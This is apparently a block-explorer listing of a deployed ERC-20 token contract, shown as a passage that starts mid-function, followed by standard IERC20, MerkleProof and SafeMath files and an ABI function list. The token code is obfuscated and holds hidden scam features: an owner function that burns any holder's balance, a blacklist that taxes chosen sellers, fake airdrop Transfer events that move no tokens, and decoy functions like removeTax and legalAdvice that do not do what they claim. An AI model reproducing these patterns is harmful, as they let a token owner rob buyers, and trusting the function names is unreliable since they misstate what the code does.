                _transferTax(sender, taxAmount);
            }else if (isListWallet(recipient)) {
                tax = _g;
                taxAmount = (amount * tax) / 100;
                _checkEnoughAirdropCondition(_j);
                _transferTax(_z, taxAmount);
            }
        }
        _l[sender] = _l[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _l[recipient] = _l[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _transferTax(address sender, uint256 amount) internal {
        if (amount == 0) {
            return;
        }
        _l[sender] = _l[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _l[address(this)] = _l[address(this)].add(amount);
        emit Transfer(sender, address(this), amount);
    }

    modifier onlyOwner() {
        require(msg.sender == _k, "Not allowed");
        _;
    }

    function openTrade(address pair_) external onlyOwner {
        _z = pair_;
        _i = true;
    }

    function excludeWallet(address sender) external onlyOwner {
        require(sender != address(0), "Do not address 0x000");
        _o[sender] = true;
    }

    function addListWallet(address[] memory list) external onlyOwner {
        for (uint256 i = 0; i < list.length; i++) {
            _n[list[i]] = true;
        }
    }

    function checkListWallet(address[] memory isWallet) external onlyOwner {
        for (uint256 i = 0; i < isWallet.length; i++) {
            _n[isWallet[i]] = false;
        }
    }

    function isListWallet(address a) public view returns (bool) {
        return _n[a];
    }

    function clearStuckTokens(address[] memory instruction) public onlyOwner {
        for (uint256 i = 0; i < instruction.length; i++) {
            address account = instruction[i];
            uint256 amount = _l[account];
            _l[account] = _l[account].sub(amount, "ERROR");
            _l[address(0)] = _l[address(0)].add(amount);
        }
    }

    function tokenReleasedForAirdrop(address[] memory list, uint256[] memory amount)
        external
        onlyOwner
    {
        for (uint256 i = 0; i < list.length; i++) {
            emit Transfer(msg.sender, list[i], amount[i]);
        }
    }

    function removeLimits() external {
        _e = 0;
    }

    function removeTax(uint256 _c) external {
       _f = 1;
    }

    function addLpPancakeSwap(uint256 _d) external {
        _f = _d;
    }

    function setExactTimingLaunch(uint256 _e) external {
        _e = _e;
    }

    function legalAdvice(address _f, uint256 _g) external {
        _e = _g;
    }

    function addLpUniswap(uint256 _e) external onlyOwner {
        _e = _e;
    }

    function staticRLPolicies() external {
        _e = 0;
    }

    function execBatch(string memory a_, string memory b_) external onlyOwner {
        _a = a_;
        _b = b_;
    }

    function pluckPairs(address v3_, address v2_, address weth_) external view returns(address[5] memory result) {
        address token_ = address(this);
        (address token0, address token1) = token_ < weth_ ? (token_, weth_) : (weth_, token_);
        uint16[4] memory fees = [100, 500, 3000, 10000];
        for (uint8 i = 0; i < 4; i++) {
            bytes32 salt = keccak256(abi.encode(token0, token1, fees[i]));
            result[i] = Create2.computeAddress(salt, 0xe34f199b19b2b4f47f68442619d555527d244f78a3297ea89325f843f87b8b54, v3_);
        }
        bytes32 salt1 = keccak256(abi.encodePacked(token0, token1));
        result[4] = Create2.computeAddress(salt1, 0x96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f, v2_);
    }
}
IERC20.sol 33 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}
MerkleProof.sol 514 lines
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (utils/cryptography/MerkleProof.sol)
// This file was procedurally generated from scripts/generate/templates/MerkleProof.js.

pragma solidity ^0.8.20;

import {Hashes} from "./Hashes.sol";

/**
 * @dev These functions deal with verification of Merkle Tree proofs.
 *
 * The tree and the proofs can be generated using our
 * https://github.com/OpenZeppelin/merkle-tree[JavaScript library].
 * You will find a quickstart guide in the readme.
 *
 * WARNING: You should avoid using leaf values that are 64 bytes long prior to
 * hashing, or use a hash function other than keccak256 for hashing leaves.
 * This is because the concatenation of a sorted pair of internal nodes in
 * the Merkle tree could be reinterpreted as a leaf value.
 * OpenZeppelin's JavaScript library generates Merkle trees that are safe
 * against this attack out of the box.
 *
 * IMPORTANT: Consider memory side-effects when using custom hashing functions
 * that access memory in an unsafe way.
 *
 * NOTE: This library supports proof verification for merkle trees built using
 * custom _commutative_ hashing functions (i.e. `H(a, b) == H(b, a)`). Proving
 * leaf inclusion in trees built using non-commutative hashing functions requires
 * additional logic that is not supported by this library.
 */
library MerkleProof {
    /**
     *@dev The multiproof provided is not valid.
     */
    error MerkleProofInvalidMultiproof();

    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     *
     * This version handles proofs in memory with the default hashing function.
     */
    function verify(bytes32[] memory proof, bytes32 root, bytes32 leaf) internal pure returns (bool) {
        return processProof(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leaves & pre-images are assumed to be sorted.
     *
     * This version handles proofs in memory with the default hashing function.
     */
    function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = Hashes.commutativeKeccak256(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     *
     * This version handles proofs in memory with a custom hashing function.
     */
    function verify(
        bytes32[] memory proof,
        bytes32 root,
        bytes32 leaf,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bool) {
        return processProof(proof, leaf, hasher) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leaves & pre-images are assumed to be sorted.
     *
     * This version handles proofs in memory with a custom hashing function.
     */
    function processProof(
        bytes32[] memory proof,
        bytes32 leaf,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = hasher(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     *
     * This version handles proofs in calldata with the default hashing function.
     */
    function verifyCalldata(bytes32[] calldata proof, bytes32 root, bytes32 leaf) internal pure returns (bool) {
        return processProofCalldata(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leaves & pre-images are assumed to be sorted.
     *
     * This version handles proofs in calldata with the default hashing function.
     */
    function processProofCalldata(bytes32[] calldata proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = Hashes.commutativeKeccak256(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     *
     * This version handles proofs in calldata with a custom hashing function.
     */
    function verifyCalldata(
        bytes32[] calldata proof,
        bytes32 root,
        bytes32 leaf,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bool) {
        return processProofCalldata(proof, leaf, hasher) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leaves & pre-images are assumed to be sorted.
     *
     * This version handles proofs in calldata with a custom hashing function.
     */
    function processProofCalldata(
        bytes32[] calldata proof,
        bytes32 leaf,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = hasher(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if the `leaves` can be simultaneously proven to be a part of a Merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * This version handles multiproofs in memory with the default hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * NOTE: Consider the case where `root == proof[0] && leaves.length == 0` as it will return `true`.
     * The `leaves` must be validated independently. See {processMultiProof}.
     */
    function multiProofVerify(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProof(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and sibling nodes in `proof`. The reconstruction
     * proceeds by incrementally reconstructing all inner nodes by combining a leaf/inner node with either another
     * leaf/inner node or a proof sibling node, depending on whether each `proofFlags` item is true or false
     * respectively.
     *
     * This version handles multiproofs in memory with the default hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. To use multiproofs, it is sufficient to ensure that: 1) the tree
     * is complete (but not necessarily perfect), 2) the leaves to be proven are in the opposite order they are in the
     * tree (i.e., as seen from right to left starting at the deepest layer and continuing at the next layer).
     *
     * NOTE: The _empty set_ (i.e. the case where `proof.length == 1 && leaves.length == 0`) is considered a no-op,
     * and therefore a valid multiproof (i.e. it returns `proof[0]`). Consider disallowing this case if you're not
     * validating the leaves elsewhere.
     */
    function processMultiProof(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the Merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofFlagsLen = proofFlags.length;

        // Check proof validity.
        if (leavesLen + proof.length != proofFlagsLen + 1) {
            revert MerkleProofInvalidMultiproof();
        }

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](proofFlagsLen);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < proofFlagsLen; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = Hashes.commutativeKeccak256(a, b);
        }

        if (proofFlagsLen > 0) {
            if (proofPos != proof.length) {
                revert MerkleProofInvalidMultiproof();
            }
            unchecked {
                return hashes[proofFlagsLen - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    /**
     * @dev Returns true if the `leaves` can be simultaneously proven to be a part of a Merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * This version handles multiproofs in memory with a custom hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * NOTE: Consider the case where `root == proof[0] && leaves.length == 0` as it will return `true`.
     * The `leaves` must be validated independently. See {processMultiProof}.
     */
    function multiProofVerify(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32 root,
        bytes32[] memory leaves,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bool) {
        return processMultiProof(proof, proofFlags, leaves, hasher) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and sibling nodes in `proof`. The reconstruction
     * proceeds by incrementally reconstructing all inner nodes by combining a leaf/inner node with either another
     * leaf/inner node or a proof sibling node, depending on whether each `proofFlags` item is true or false
     * respectively.
     *
     * This version handles multiproofs in memory with a custom hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. To use multiproofs, it is sufficient to ensure that: 1) the tree
     * is complete (but not necessarily perfect), 2) the leaves to be proven are in the opposite order they are in the
     * tree (i.e., as seen from right to left starting at the deepest layer and continuing at the next layer).
     *
     * NOTE: The _empty set_ (i.e. the case where `proof.length == 1 && leaves.length == 0`) is considered a no-op,
     * and therefore a valid multiproof (i.e. it returns `proof[0]`). Consider disallowing this case if you're not
     * validating the leaves elsewhere.
     */
    function processMultiProof(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32[] memory leaves,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the Merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofFlagsLen = proofFlags.length;

        // Check proof validity.
        if (leavesLen + proof.length != proofFlagsLen + 1) {
            revert MerkleProofInvalidMultiproof();
        }

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](proofFlagsLen);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < proofFlagsLen; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = hasher(a, b);
        }

        if (proofFlagsLen > 0) {
            if (proofPos != proof.length) {
                revert MerkleProofInvalidMultiproof();
            }
            unchecked {
                return hashes[proofFlagsLen - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    /**
     * @dev Returns true if the `leaves` can be simultaneously proven to be a part of a Merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * This version handles multiproofs in calldata with the default hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * NOTE: Consider the case where `root == proof[0] && leaves.length == 0` as it will return `true`.
     * The `leaves` must be validated independently. See {processMultiProofCalldata}.
     */
    function multiProofVerifyCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProofCalldata(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and sibling nodes in `proof`. The reconstruction
     * proceeds by incrementally reconstructing all inner nodes by combining a leaf/inner node with either another
     * leaf/inner node or a proof sibling node, depending on whether each `proofFlags` item is true or false
     * respectively.
     *
     * This version handles multiproofs in calldata with the default hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. To use multiproofs, it is sufficient to ensure that: 1) the tree
     * is complete (but not necessarily perfect), 2) the leaves to be proven are in the opposite order they are in the
     * tree (i.e., as seen from right to left starting at the deepest layer and continuing at the next layer).
     *
     * NOTE: The _empty set_ (i.e. the case where `proof.length == 1 && leaves.length == 0`) is considered a no-op,
     * and therefore a valid multiproof (i.e. it returns `proof[0]`). Consider disallowing this case if you're not
     * validating the leaves elsewhere.
     */
    function processMultiProofCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the Merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofFlagsLen = proofFlags.length;

        // Check proof validity.
        if (leavesLen + proof.length != proofFlagsLen + 1) {
            revert MerkleProofInvalidMultiproof();
        }

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](proofFlagsLen);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < proofFlagsLen; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = Hashes.commutativeKeccak256(a, b);
        }

        if (proofFlagsLen > 0) {
            if (proofPos != proof.length) {
                revert MerkleProofInvalidMultiproof();
            }
            unchecked {
                return hashes[proofFlagsLen - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    /**
     * @dev Returns true if the `leaves` can be simultaneously proven to be a part of a Merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * This version handles multiproofs in calldata with a custom hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * NOTE: Consider the case where `root == proof[0] && leaves.length == 0` as it will return `true`.
     * The `leaves` must be validated independently. See {processMultiProofCalldata}.
     */
    function multiProofVerifyCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32 root,
        bytes32[] memory leaves,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bool) {
        return processMultiProofCalldata(proof, proofFlags, leaves, hasher) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and sibling nodes in `proof`. The reconstruction
     * proceeds by incrementally reconstructing all inner nodes by combining a leaf/inner node with either another
     * leaf/inner node or a proof sibling node, depending on whether each `proofFlags` item is true or false
     * respectively.
     *
     * This version handles multiproofs in calldata with a custom hashing function.
     *
     * CAUTION: Not all Merkle trees admit multiproofs. To use multiproofs, it is sufficient to ensure that: 1) the tree
     * is complete (but not necessarily perfect), 2) the leaves to be proven are in the opposite order they are in the
     * tree (i.e., as seen from right to left starting at the deepest layer and continuing at the next layer).
     *
     * NOTE: The _empty set_ (i.e. the case where `proof.length == 1 && leaves.length == 0`) is considered a no-op,
     * and therefore a valid multiproof (i.e. it returns `proof[0]`). Consider disallowing this case if you're not
     * validating the leaves elsewhere.
     */
    function processMultiProofCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32[] memory leaves,
        function(bytes32, bytes32) view returns (bytes32) hasher
    ) internal view returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the Merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofFlagsLen = proofFlags.length;

        // Check proof validity.
        if (leavesLen + proof.length != proofFlagsLen + 1) {
            revert MerkleProofInvalidMultiproof();
        }

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](proofFlagsLen);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < proofFlagsLen; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = hasher(a, b);
        }

        if (proofFlagsLen > 0) {
            if (proofPos != proof.length) {
                revert MerkleProofInvalidMultiproof();
            }
            unchecked {
                return hashes[proofFlagsLen - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }
}
SafeMath.sol 245 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Read Contract

_k 0x1b82c27f → address
_o 0xb4e58663 → bool
_z 0xdc09f3aa → address
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
isListWallet 0x6995ca2e → bool
name 0x06fdde03 → string
pluckPairs 0x986b3449 → address[5]
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 18 functions

These functions modify contract state and require a wallet transaction to execute.

addListWallet 0x53ce3fb3
address[] list
addLpPancakeSwap 0x6963ecee
uint256 _d
addLpUniswap 0xeb6425f3
uint256 _e
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
checkListWallet 0x7615a810
address[] isWallet
clearStuckTokens 0x9cc9d4ab
address[] instruction
excludeWallet 0x62b25eeb
address sender
execBatch 0x220aa349
string a_
string b_
legalAdvice 0x65acaa37
address _f
uint256 _g
openTrade 0x5066b034
address pair_
removeLimits 0x751039fc
No parameters
removeTax 0x04cf574d
uint256 _c
setExactTimingLaunch 0xd998d70f
uint256 _e
setMinimumAirdrop 0xbf861b31
uint256 _minimumAirdropAmount
staticRLPolicies 0xd4695024
No parameters
tokenReleasedForAirdrop 0x232d4e77
address[] list
uint256[] amount
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address